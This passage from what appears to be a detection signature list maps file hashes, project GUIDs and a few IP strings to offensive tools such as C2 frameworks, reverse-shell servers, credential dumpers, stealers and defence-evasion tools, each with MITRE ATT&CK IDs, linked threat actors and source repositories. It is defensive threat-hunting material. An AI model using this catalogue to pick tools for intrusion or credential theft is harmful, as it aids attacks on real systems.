"*18913650346b45f2c32f414f1f82c5a6ca6fefaf7294e292c71cccf18332632b*",".{0,1000}18913650346b45f2c32f414f1f82c5a6ca6fefaf7294e292c71cccf18332632b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22466"
"*189219A1-9A2A-4B09-8F69-6207E9996F94*",".{0,1000}189219A1\-9A2A\-4B09\-8F69\-6207E9996F94.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22467"
"*18950aed7a4061673d241d5548f425779a3fa89e734a28b2b91fed786894a698*",".{0,1000}18950aed7a4061673d241d5548f425779a3fa89e734a28b2b91fed786894a698.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22468"
"*189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482*",".{0,1000}189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","22471"
"*18a3d4ed574aa0dc9739be285b98eca7fc79eba3776821a13539f06447a22704*",".{0,1000}18a3d4ed574aa0dc9739be285b98eca7fc79eba3776821a13539f06447a22704.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22473"
"*18A66118-B98D-4FFC-AABE-DAFF5779F14C*",".{0,1000}18A66118\-B98D\-4FFC\-AABE\-DAFF5779F14C.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#GUIDproject","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","22474"
"*18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b*",".{0,1000}18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22478"
"*18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed*",".{0,1000}18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","22479"
"*18c54c69f41d0b7e5928c34e1e9350ed99ecd0278ea37df11a429018ca3d05ed*",".{0,1000}18c54c69f41d0b7e5928c34e1e9350ed99ecd0278ea37df11a429018ca3d05ed.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","22480"
"*18c5b272fb057271e5017d232deb701e195e05f7a7c0a98b176325dfc2774a30*",".{0,1000}18c5b272fb057271e5017d232deb701e195e05f7a7c0a98b176325dfc2774a30.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22481"
"*18C681A2-072F-49D5-9DE6-74C979EAE08B*",".{0,1000}18C681A2\-072F\-49D5\-9DE6\-74C979EAE08B.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","#GUIDproject","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","22482"
"*18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7*",".{0,1000}18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","22484"
"*18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24*",".{0,1000}18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22485"
"*18da2934d552b548d067b86dc22cad36399bb3e24395de0f9c13b4f6a8f09b74*",".{0,1000}18da2934d552b548d067b86dc22cad36399bb3e24395de0f9c13b4f6a8f09b74.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22488"
"*18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed*",".{0,1000}18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22490"
"*18e5187ae45ee5e13379dae0657430a843fae52848b19f572d2fde65906cad4d*",".{0,1000}18e5187ae45ee5e13379dae0657430a843fae52848b19f572d2fde65906cad4d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22491"
"*18e9b39ab7c27ea80c6b76fc04881a5348de491ab22abe65a6bdb7254e23d5d1*",".{0,1000}18e9b39ab7c27ea80c6b76fc04881a5348de491ab22abe65a6bdb7254e23d5d1.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22492"
"*18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782*",".{0,1000}18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","22494"
"*18f07ed52889ed4acd8967813d25ff8c5494b1fdfd1c0727eb7cad73d5fd7a2f*",".{0,1000}18f07ed52889ed4acd8967813d25ff8c5494b1fdfd1c0727eb7cad73d5fd7a2f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22495"
"*18fce84919acb963f9ed765c122a5ff844a62036b4bdfaf6c95a30907d14460f*",".{0,1000}18fce84919acb963f9ed765c122a5ff844a62036b4bdfaf6c95a30907d14460f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22496"
"*19013572f33e98d38e2236f86b6659b0324409b670680b6fbb9036f7630372c4*",".{0,1000}19013572f33e98d38e2236f86b6659b0324409b670680b6fbb9036f7630372c4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22497"
"*1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181*",".{0,1000}1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22498"
"*190DFAEB-0288-4043-BE0E-3273FA653B52*",".{0,1000}190DFAEB\-0288\-4043\-BE0E\-3273FA653B52.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#GUIDproject","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","22499"
"*1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf*",".{0,1000}1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22501"
"*191726b972ff700b962e92c032e0f155ab314c2edec1517e18f69c63073eb859*",".{0,1000}191726b972ff700b962e92c032e0f155ab314c2edec1517e18f69c63073eb859.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22502"
"*1917921CEF704F71B692C3EC0D238FE98AF8EF1EE20CACAAD67FBC3BB885EE9A*",".{0,1000}1917921CEF704F71B692C3EC0D238FE98AF8EF1EE20CACAAD67FBC3BB885EE9A.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22504"
"*19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88*",".{0,1000}19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22505"
"*191fdeb92ab3cf8ae11e804d907366ff7ee95d92f10b88f352aeeb3ea1d8ff52*",".{0,1000}191fdeb92ab3cf8ae11e804d907366ff7ee95d92f10b88f352aeeb3ea1d8ff52.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22506"
"*192.168.0.110:1234*",".{0,1000}192\.168\.0\.110\:1234.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","22507"
"*192.168.1.229 Passw0rd!*",".{0,1000}192\.168\.1\.229\sPassw0rd!.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","22508"
"*1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731*",".{0,1000}1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22509"
"*192f251afb217d7b5080564ef78df67235cf0e47bd78a458706a5dd958a9d093*",".{0,1000}192f251afb217d7b5080564ef78df67235cf0e47bd78a458706a5dd958a9d093.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22510"
"*19344cc373b3ed325dd8fcbd5ea333922495486b206c6098c7314f055e194646*",".{0,1000}19344cc373b3ed325dd8fcbd5ea333922495486b206c6098c7314f055e194646.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22513"
"*193aee65af4af71fe6194ac4c2214a27d78706558c25022f018ed3e28bfe7670*",".{0,1000}193aee65af4af71fe6194ac4c2214a27d78706558c25022f018ed3e28bfe7670.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22514"
"*193b8c35b6f71c1a9c53befb0d950d7734743da958cd6d1a47975b3c4af6cdd2*",".{0,1000}193b8c35b6f71c1a9c53befb0d950d7734743da958cd6d1a47975b3c4af6cdd2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22515"
"*193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa*",".{0,1000}193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22516"
"*1952b4c118cb7ca4aa49a835036782a0f240d9ae6214661ac76b4320eb20abd8*",".{0,1000}1952b4c118cb7ca4aa49a835036782a0f240d9ae6214661ac76b4320eb20abd8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22520"
"*1958310b6f2ab97181768cdebab34fd9eff9218280b9a6a753800009ded8f9b7*",".{0,1000}1958310b6f2ab97181768cdebab34fd9eff9218280b9a6a753800009ded8f9b7.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","22521"
"*195c384a1caf0e50ea74c69de39b90e27dcc9635d951f8a652cc322696614e59*",".{0,1000}195c384a1caf0e50ea74c69de39b90e27dcc9635d951f8a652cc322696614e59.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22522"
"*195cbf85cbf9fc7dcd011b2658819cf3350195f61021cb7c5a6f6e32cba15f03*",".{0,1000}195cbf85cbf9fc7dcd011b2658819cf3350195f61021cb7c5a6f6e32cba15f03.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","22523"
"*196581c3cefce544c150faf2fb0ed7d82940adac5f2a5b51e034453644f725c6*",".{0,1000}196581c3cefce544c150faf2fb0ed7d82940adac5f2a5b51e034453644f725c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22524"
"*1965d3bd9a3a06fe2f9706410cb44194e4b23ddb51ed23fcc3bf4ed91681c9d4*",".{0,1000}1965d3bd9a3a06fe2f9706410cb44194e4b23ddb51ed23fcc3bf4ed91681c9d4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22525"
"*196B8469-F798-4ECC-9A77-C1CAB5BF6EAE*",".{0,1000}196B8469\-F798\-4ECC\-9A77\-C1CAB5BF6EAE.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","22526"
"*196c82b02658590978ac1649a859f15db1ebd9012027d9a80674241ecc003400*",".{0,1000}196c82b02658590978ac1649a859f15db1ebd9012027d9a80674241ecc003400.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22527"
"*196fdd20e7b602c3b86450e6d4da311618509d31fd3be0af50dee8bd76a5130c*",".{0,1000}196fdd20e7b602c3b86450e6d4da311618509d31fd3be0af50dee8bd76a5130c.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","22529"
"*19729c5e11a7925f7b9ede557e6acf71da961f0a609e72b1f2f836e5f40533e3*",".{0,1000}19729c5e11a7925f7b9ede557e6acf71da961f0a609e72b1f2f836e5f40533e3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22530"
"*19735351ac352430f7b951a11b6a9a9d64a1e911f5471b861276c39b84e1302f*",".{0,1000}19735351ac352430f7b951a11b6a9a9d64a1e911f5471b861276c39b84e1302f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22531"
"*197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4*",".{0,1000}197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22533"
"*197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa*",".{0,1000}197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","#filehash","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","22534"
